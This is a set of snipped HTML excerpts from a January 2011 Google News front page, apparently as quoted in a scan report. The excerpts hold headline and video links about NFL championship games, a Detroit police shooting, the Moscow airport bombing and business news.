<noscript><a href="http://www.youtube.com/watch?v=6_dUkNdoPZI">Video:&nbsp;
Raw Video: Packers Fans Rejoice in NFC Title
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl" target="_blank" class="usg-AFQjCNGQElfXImuP5gjNiO4sKtARSBFJYA " id="MAA4AEgRUAFgAmoCdXM">Roethlisberger, Rodgers look to bounce back in Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPpTk4ieUXgu-P8RRRMf8MWo7J0w " href="http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGPrr0vkoRqaEiQt3vFQA_4L6QnyA " href="http://www.chron.com/disp/story.mpl/ap/tx/7395456.html" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGQGgM5czT5R6B-ddNymghkSc-UmA " href="http://www.nesn.com/2011/01/charles-woodson-packers-send-barack-obama-a-message-after-nfc-championship.html" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJIPZyVcw6wNepnm-LyDHFaO6Clg " href="http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/w_tEYbzpZ15crM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHS5uJx4olbyF9osDF3gTDGuyuCPg " href="http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3i4eR4POFOw">Video:&nbsp;
Detroit rape suspect to be arraigned on several assault counts.
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison" target="_blank" class="usg-AFQjCNHDjiKWPniNGy7SY6MsW0KH4Ih34Q " id="MAA4AEgSUAFgAmoCdXM">Detroit rape suspect, 31, has spent almost half his life in prison</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEalDUBH8-HQVONhcKZ4MW2d5rlSw " href="http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack" id="MAA4AEgSUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCCEQVPyyjZin-IgS-GZbKQg96lw " href="http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFr6r5QBoathNzT09PJwnvBUwlkuA " href="http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/21/sundays-a-f-c-championship-matchup/" class="usg-AFQjCNHmjAMFU4b0us-F6VwKbdDgRkDgpQ " title="New York Times (blog)"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/1q0LPLp7fAUbbM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/21/sundays-a-f-c-championship-matchup/" class="usg-AFQjCNHmjAMFU4b0us-F6VwKbdDgRkDgpQ "> New York Ti... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG6qrigwK0jGaJWzKxvUijw-g-xcA " href="http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&amp;campaign=rss&amp;source=NFLHeadlines" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video:&nbsp;
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/AP08eefa0c9e844584a494106fb21688b5.html" target="_blank" class="usg-AFQjCNFbJ1uuza5woqRu_iLy2zuvPb41xw " id="MAA4AEgTUAFgAmoCdXM">Rex Ryan still feeling Super about Jets&#39; future</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEl1IHYaTs16CTlgmfI4z1L2yr4yg " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/" id="MAA4AEgTUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTsAZ0TgzKZ399uC9seSOMhzGZ4w " href="http://nfl.fanhouse.com/2011/01/24/afc-nfc-championship-games-continue-nfls-tv-ratings-boon/" id="MAA4AEgTUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2AZEXbdt5AYsMtu8msDEkOt-3Fw " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF9C8wL3fOFsYTsgaPRXS8A3ltpVg " href="http://www.nfl.com/news/story/09000d5d81de420a/article/conference-title-games-garner-best-tv-ratings-in-14-years" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg " title="ABC News"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/4qo0wQiEBATaaM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHD9gmMcX5UbuSNEialO4A3C839Zg " href="http://online.wsj.com/article/BT-CO-20110124-713737.html" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html" target="_blank" class="usg-AFQjCNGdoU1Lh67pcIeV49PyT7DoCZ4pRg " id="MAA4AEgUUAJgAmoCdXM">Cantor declares state bankruptcy law DOA</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFsJ-xmO_ejoSJAqbQS-S39fJbZpg " href="http://www.reuters.com/article/idUSN2419775920110124" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhzLhkbOVz53QHJ6bmW7YycCP-lA " href="http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYGF2tFrtqpMAo1sUiv4XCv4MgNA " href="http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVSFWw5bW8lOlkPcETmuGH7fJddA " href="http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html" id="MAA4AEgUUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N1KK20110124" class="usg-AFQjCNEwrFmcSsRQmTv2cj4t94sEYVwECg " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/nDfXuLMkVhCuOM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N1KK20110124" class="usg-AFQjCNEwrFmcSsRQmTv2cj4t94sEYVwECg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEW9WCHK4yVIzY7YU49PFGPQMbJVA " href="http://www.nytimes.com/2011/01/25/world/middleeast/25israel.html" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3AGVHcnCKws">Video:&nbsp;
Hezbollah wants national unity government
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/24/hezbollah-backed-candidate-lebanon-pm" target="_blank" class="usg-AFQjCNFd_sxRNnRB9acSagaGcnxPwcjqNQ " id="MAA4AEgVUAFgAmoCdXM">Hezbollah-backed candidate poised to become Lebanon PM</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE4eXowgPSlua1VqG8Nf0LMONQahQ " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12267758" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHzPnrFXiqbLghRyezzQRMq7Vz9Gg " href="http://www.reuters.com/article/idUSTRE70N33820110124" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/globe-investor/american-express-revenue-rises-13-per-cent/article1881303/" class="usg-AFQjCNGQH_PAD0kP3hmk5sNmfexx-KuxFQ " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/fXOebJLaR-M2pM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/globe-investor/american-express-revenue-rises-13-per-cent/article1881303/" class="usg-AFQjCNGQH_PAD0kP3hmk5sNmfexx-KuxFQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHR-Papxe37QtxuLRJAJTk8ZAj5ww " href="http://www.foxbusiness.com/markets/2011/01/24/amex-q-profit-surges-improved-spending/" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/BT-CO-20110124-714199.html" target="_blank" class="usg-AFQjCNGZ6fkKff0JkSroHsp9vLD_nXlG6w " id="MAA4AEgWUAFgAmoCdXM">American Express 4Q Net Jumps 48%; Loss Provisions Cut</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSTRE70N6K220110124" target="_blank" class="usg-AFQjCNHCcliRpS-FAzKWpoedzHlk6cVgYQ " id="MAA4AEgWUAJgAmoCdXM">American Express 4th-quarter revenue rises 13 percent</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH2OHHOGYc_oE7NmaP9FHOpQc6DgA " href="http://www.marketwatch.com/story/amex-quarterly-profit-jumps-44-2011-01-24" id="MAA4AEgWUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEqe4r8926Yq7SOfQoNlc5kO4KKsA " href="http://www.bloomberg.com/news/2011-01-24/american-express-profit-climbs-48-as-credit-card-spending-reaches-record.html" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTMS3txWzK91nm7iQNLB3viWDKng " href="http://www.thestreet.com/story/10983446/1/american-express-profits-up.html?cm_ven=GOOGLEN" id="MAA4AEgWUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHiERdzKjGz_owcJAKwYgaq2jAmhQ " href="http://www.cnn.com/2011/WORLD/africa/01/24/winds.change/?hpt=C1" id="-9130425399277123681"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUIAy8iUF8AYKI9an-TtV9uy8Ftw " href="http://www.foxnews.com/world/2011/01/24/ap-interview-iaea-critical-irans-cooperation/" id="415738970037031730"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="1857102735582363016"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEK2ud_k0F8qRyqgsh-kAYgITivyQ " href="http://voices.washingtonpost.com/capitalsinsider/matt-hendricks/video-matt-hendricks-answers-y.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEYW-eOsdylgGuCJv1odl_DRoolHg " href="http://voices.washingtonpost.com/dr-gridlock/2011/01/bill_would_allow_mcdonnell_to.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE64Ep_yxeXZUqNQV9MB1-njgF7pQ " href="http://voices.washingtonpost.com/capitalsinsider/new-york-rangers/capitals-seek-more-than-redemp.html" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUVFbVVUXTIHlz-l1C5dBB5sKdxg " href="http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH8qeVdzvBEnfzEKH7vE3_vwVQTqg " href="http://www.naturalnews.com/031076_USDA_bird_deaths.html" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNF2Ndq7u1NFQAEeGnztrLOHGBXwVA " href="http://online.wsj.com/article/SB10001424052748703954004576090020541379588.html" id="MAE4AUgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGblh1wTgbZsSv-VYZXiNbBHiKNXw " href="http://news.nationalgeographic.com/news/2011/01/110119-yellowstone-park-supervolcano-eruption-magma-science/" id="MAE4AUgDUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFox8ILKO8us5SSJskhPVJPFB3IJQ " href="http://www.wired.com/epicenter/2011/01/google-voice-lsd-trip/" id="MAE4AUgEUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHyWl3EN4CNcBZDRvx0uWAGqRTn-w " href="http://www.bbc.co.uk/news/uk-12225163" id="MAE4AUgFUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGGQHDo9ynACtTjJAIzBv77Y3Il_g " href="http://www.latimes.com/news/local/la-me-surfer-mavericks-20110124,0,4017331.story" id="MAE4AUgGUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEge-ZTK-NGgKR5GGl5cueoZK1MNQ " href="http://www.cnn.com/2011/WORLD/europe/01/21/femen.topless.protest/" id="MAE4AUgHUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE5JHQ3Gv91XCD5GZEafo-YjxGefA " href="http://www.nytimes.com/2011/01/22/your-money/401ks-and-similar-plans/22money.html" id="MAE4AUgIUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFqlgKE7z1GSfD-_OAHlbbllpcUzA " href="http://online.wsj.com/article/SB10001424052748703951704576092371207903438.html" id="MAE4AUgJUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHZbk8n6TInb7AFBrRghx7rtQNorw " href="http://www.nascar.com/news/110120/preseason-thunder-daytona-tstewart-jjohnson-dhamlin-cedwards/" id="MAE4AUgKUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEdtmVNLHhQzK5b8i2ymGRHBdQgJw " href="http://www.nytimes.com/2011/01/23/books/review/Paul-t.html" id="MAE4AUgLUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Domodedovo blast masterminds proud of terror &#39;fundraiser&#39; - Peter Lavelle</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">NBA TV Top 5: January 23rd</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Sport Science: Devin Hester Vs. A Black Bear</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/jKYkFgMz7fQ/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/jKYkFgMz7fQ/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=jKYkFgMz7fQ">Raw Video: Deadly Explosion at Moscow Airport</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=jKYkFgMz7fQ">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/RC1jTMh02O0/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/RC1jTMh02O0/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=RC1jTMh02O0">Police: Multiple Fla. Officers Shot</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=RC1jTMh02O0">Watch video</a>
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHH_B8Vhlsac2V2jAPJyKDuyVeAAA " href="http://mashable.com/2011/01/24/engaging-facebook-fans/" id="-7258938783345423075"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2LifoZ2DaEkfGjsc9kMMPnJB2kg " href="http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml" id="-7252428281190763667"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEPdEfqF2nkQ1qDcAFFpZusUDt9tA " href="http://www.reuters.com/article/idUSTRE70N2TQ20110124" id="5335316056229417362"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNENgV2GEqlhUgEGu5EME68UcyGRvw " href="http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/" id="-6685976054251165433"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE9LKKsqu443-DV8lm4q72snzhdWw " href="http://www.nytimes.com/2011/01/24/technology/24cook.html" id="3851731467917620472"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNF0sJpX5iFReuTSkI-eJ2x5QatHcA " href="http://www.nytimes.com/2011/01/24/business/24fees.html?src=busln" id="-6745807016666702947"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFu_9RyhYijNKzwJqwfe2g-y3O7vA " href="http://www.chicagotribune.com/news/local/breaking/chibrknews-court-rules-against-emanuel-on-01242011,0,4083659.story" id="6711712754283306360"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHT_jvJT_yNF5cx8BE3V88ObIMsfQ " href="http://online.wsj.com/article/SB10001424052748704881304576094000352599050.html" id="3419897226598733059"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHe-laFgexyFrmfE7lXlS-da3UXCA " href="http://mashable.com/2011/01/20/google-offers/" id="-2235673424111835580"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEsz7_xejPP6VsD3NuWdHvxda40Kg " href="http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html" id="1375770744202528156"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGLZSeleCrQ4gBas6xZiwZUPYDCYQ " href="http://www.huffingtonpost.com/2011/01/17/starbucks-new-size-trenta-graphic_n_810083.html" id="-6583013401083455589"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIKm4Fup2J5xjAnEf8e9q0nfSP0Q " href="http://www.nytimes.com/2011/01/18/opinion/18brooks.html" id="5024855345474111787"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIqQNaGnqPT81jx2kLrr0Da_XsHg " href="http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln" id="6107526647097459892"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEQX0__xR6F03eNBD80wQ9ztviVrQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html" id="6905605053023830163"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHmXxgsr2Peqa9XqIE5wJgWC0cf0w " href="http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162" id="-8119849514259291457"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGpLGEB4oQts2tE3LiQynQ3Z-K5RQ " href="http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844" id="7279004896616451596"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE6ybBw84x9uoypftV5tngJHzOltg " href="http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/" id="6382990014983290027"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG6VFJsd5LghOJQDRVmX0-Z39bpvg " href="http://mashable.com/2011/01/12/obsessed-with-facebook-infographic/" id="-5027991129252007488"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGefgxSphxOT7DWIJfYen2FHqVKeA " href="http://www.huffingtonpost.com/2011/01/13/new-zodiac-sign-dates-oph_n_808567.html" id="2526493708698605676"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGguw_7ImLDpzcb2GdQY0b690KAjA " href="http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html" id="6034302388163933602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG31ieJjehuVhbmm8A6VoEwB34ufg " href="http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/" id="-5002562622630809801"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEBCqmXL7Go4fAtoGveE-Ftib_JTA " href="http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html" id="5830623823895293286"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHctKe5Y-WBhY6hGZFBttgAQRB3-Q " href="http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/" id="1409758142476247527"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEkadxsOjF3ACMoM7ayuBEhtjIiRw " href="http://www.wired.com/threatlevel/2011/01/twitter/" id="-198025857784313602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFyXWaX3UnCdLqv5YPYdbvsndnWkg " href="http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages" id="-2612389445387481788"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEK4OuQ5vLuSdUivCvstxdy78zHhA " href="http://www.slate.com/id/2281146/" id="-303322691301458140"><span class="titletext">
...[SNIP]...
<div class="goog-menuitem" id="s-email"><img class="icon email-icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="15" height="15" alt="Share story by email"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-reader-titleurl" value="url"><img class="share-icon-reader icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Google Reader Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-fb-titleurl" value="u"><img class="share-icon-facebook icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Facebook Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-twitter-shareurl" value="http://twitter.com/home"><img class="share-icon-twitter icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Twitter Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-buzz-titleurl" value="url"><img class="icon share-icon-buzz" src="http://www.gstatic.com/news/img/cleardot.gif" alt="Buzz this story"><span class="sharing-link">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
